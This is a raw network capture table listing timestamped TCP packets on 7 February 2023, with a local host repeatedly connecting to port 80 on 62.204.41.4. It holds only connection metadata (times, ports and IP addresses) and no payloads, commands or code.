Feb 7, 2023 19:57:29.140163898 CET	80	49789	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.140331984 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.257853985 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.258662939 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.319027901 CET	80	49789	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.319180965 CET	49789	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.322828054 CET	80	49790	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.323014021 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.323509932 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.384843111 CET	80	49790	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.387468100 CET	80	49790	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.387666941 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.492815018 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.494050980 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.554224968 CET	80	49790	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.554311037 CET	49790	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.555476904 CET	80	49791	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.555560112 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.556150913 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.617487907 CET	80	49791	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.620400906 CET	80	49791	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.620594978 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.726574898 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.727423906 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.788139105 CET	80	49791	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.788198948 CET	80	49792	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.788326979 CET	49791	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.788403034 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.791090965 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.851840973 CET	80	49792	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.854423046 CET	80	49792	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:29.854690075 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.971158981 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:29.972348928 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.032004118 CET	80	49792	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.032200098 CET	49792	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.033623934 CET	80	49793	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.033880949 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.034311056 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.096144915 CET	80	49793	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.099855900 CET	80	49793	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.100054979 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.226433992 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.227287054 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.287671089 CET	80	49794	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.287919044 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.287988901 CET	80	49793	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.288126945 CET	49793	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.288757086 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.349548101 CET	80	49794	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.352380037 CET	80	49794	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.352566957 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.460952044 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.461854935 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.521225929 CET	80	49794	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.521379948 CET	80	49795	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.521441936 CET	49794	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.521517038 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.522001028 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.582824945 CET	80	49795	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.586111069 CET	80	49795	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.586335897 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.699717045 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.700674057 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.759572029 CET	80	49795	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.759850979 CET	49795	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.763231993 CET	80	49796	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.763415098 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.765230894 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.828480005 CET	80	49796	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.831082106 CET	80	49796	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:30.831165075 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.947246075 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:30.948246002 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.009699106 CET	80	49797	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.009733915 CET	80	49796	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.009864092 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.009912014 CET	49796	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.010574102 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.075014114 CET	80	49797	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.080058098 CET	80	49797	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.080167055 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.199893951 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.200579882 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.261233091 CET	80	49797	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.261343002 CET	49797	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.261707067 CET	80	49798	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.261846066 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.270025015 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.331587076 CET	80	49798	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.334840059 CET	80	49798	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.334975958 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.445187092 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.445838928 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.506623983 CET	80	49798	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.506861925 CET	49798	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.507180929 CET	80	49799	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.507287025 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.508215904 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.569600105 CET	80	49799	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.572635889 CET	80	49799	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.572776079 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.683106899 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.684144974 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.744446039 CET	80	49800	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.744672060 CET	80	49799	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.744879961 CET	49799	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.745131016 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.745131016 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.805378914 CET	80	49800	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.808176041 CET	80	49800	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.809385061 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.915937901 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.917702913 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.976438999 CET	80	49800	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.977957964 CET	80	49801	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:31.978167057 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.978610039 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:31.979372025 CET	49800	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.038789034 CET	80	49801	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.041812897 CET	80	49801	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.041999102 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.149131060 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.150176048 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.209805012 CET	80	49801	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.210058928 CET	49801	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.211612940 CET	80	49802	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.212301016 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.212400913 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.273642063 CET	80	49802	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.278455973 CET	80	49802	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.278712988 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.385632992 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.386578083 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.447149992 CET	80	49802	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.447196007 CET	80	49803	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.447359085 CET	49802	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.447407007 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.447940111 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.508809090 CET	80	49803	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.512260914 CET	80	49803	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.516201973 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.636764050 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.637692928 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.697463989 CET	80	49803	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.698395967 CET	80	49804	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.698586941 CET	49803	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.698633909 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.699146986 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.759757042 CET	80	49804	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.763117075 CET	80	49804	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.763406038 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.867677927 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.868577003 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.927828074 CET	80	49805	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.928028107 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.928472042 CET	80	49804	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.928580999 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.928613901 CET	49804	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:32.987711906 CET	80	49805	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.990704060 CET	80	49805	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:32.990865946 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.102190971 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.103203058 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.161602974 CET	80	49805	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.165414095 CET	49805	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.165637016 CET	80	49806	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.165764093 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.169487953 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.231969118 CET	80	49806	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.236960888 CET	80	49806	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.237143040 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.365351915 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.366417885 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.428029060 CET	80	49806	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.428251982 CET	49806	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.428839922 CET	80	49807	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.428944111 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.429667950 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.492259979 CET	80	49807	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.494484901 CET	80	49807	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.494609118 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.604598045 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.607597113 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.667586088 CET	80	49807	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.667761087 CET	49807	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.668731928 CET	80	49808	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.668873072 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.669442892 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.730001926 CET	80	49808	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.732368946 CET	80	49808	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.732530117 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.836170912 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.838772058 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.896914005 CET	80	49808	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.897083998 CET	49808	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.899101973 CET	80	49809	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.899238110 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.899730921 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:33.959841967 CET	80	49809	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.962928057 CET	80	49809	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:33.963205099 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.071860075 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.071948051 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.132230043 CET	80	49809	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.132380009 CET	49809	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.134332895 CET	80	49810	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.134561062 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.139597893 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.202187061 CET	80	49810	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.206943989 CET	80	49810	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.207079887 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.320986986 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.321913958 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.382538080 CET	80	49811	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.382730961 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.383589029 CET	80	49810	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.383717060 CET	49810	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.389822006 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.450138092 CET	80	49811	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.454195976 CET	80	49811	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.454319000 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.573307037 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.574244022 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.634715080 CET	80	49812	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.634865999 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.634963989 CET	80	49811	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.635025024 CET	49811	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.636727095 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.696114063 CET	80	49812	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.699321985 CET	80	49812	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.699454069 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.833117962 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.834054947 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.892541885 CET	80	49812	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.892637014 CET	49812	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.895361900 CET	80	49813	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.895483971 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.897396088 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:34.958676100 CET	80	49813	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.961111069 CET	80	49813	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:34.961427927 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.071269035 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.072182894 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.131691933 CET	80	49814	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.131891012 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.132658958 CET	80	49813	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.132796049 CET	49813	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.140362024 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.199918032 CET	80	49814	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.204200029 CET	80	49814	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.204343081 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.340053082 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.341883898 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.400175095 CET	80	49814	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.400640965 CET	49814	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.403491974 CET	80	49815	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.403611898 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.404124022 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.466156960 CET	80	49815	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.468318939 CET	80	49815	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.468416929 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.571480989 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.572464943 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.632044077 CET	80	49816	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.633053064 CET	80	49815	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.633100033 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.633133888 CET	49815	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.633778095 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.693408012 CET	80	49816	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.696065903 CET	80	49816	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.697089911 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.807426929 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.808139086 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.867134094 CET	80	49816	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.868499041 CET	49816	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.870834112 CET	80	49817	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.874314070 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.876379967 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:35.938970089 CET	80	49817	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.941781998 CET	80	49817	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:35.941939116 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.055578947 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.056719065 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.118724108 CET	80	49817	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.118772030 CET	80	49818	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.118927956 CET	49817	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.118978977 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.123766899 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.185410023 CET	80	49818	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.189352036 CET	80	49818	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.190301895 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.310379982 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.311552048 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.371952057 CET	80	49818	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.372142076 CET	49818	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.372637987 CET	80	49819	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.372770071 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.373214960 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.434400082 CET	80	49819	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.436902046 CET	80	49819	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.437145948 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.540112019 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.541088104 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.601488113 CET	80	49819	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.601675034 CET	49819	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.603183031 CET	80	49821	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.603360891 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.603813887 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.666733027 CET	80	49821	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.669253111 CET	80	49821	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.669406891 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.775893927 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.776793003 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.838181973 CET	80	49821	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.838213921 CET	80	49822	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.838279963 CET	49821	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.838506937 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.840229988 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:36.901715040 CET	80	49822	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.904748917 CET	80	49822	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:36.904918909 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.013631105 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.014503956 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.075187922 CET	80	49822	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.075221062 CET	80	49823	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.075375080 CET	49822	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.075401068 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.077825069 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.138287067 CET	80	49823	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.142604113 CET	80	49823	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.142769098 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.259269953 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.260270119 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.319526911 CET	80	49824	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.319638968 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.319843054 CET	80	49823	62.204.41.4	192.168.2.5
Feb 7, 2023 19:57:37.319906950 CET	49823	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.320313931 CET	49824	80	192.168.2.5	62.204.41.4
Feb 7, 2023 19:57:37.379473925 CET	80	49824	62.204.41.4	192.168.2.5
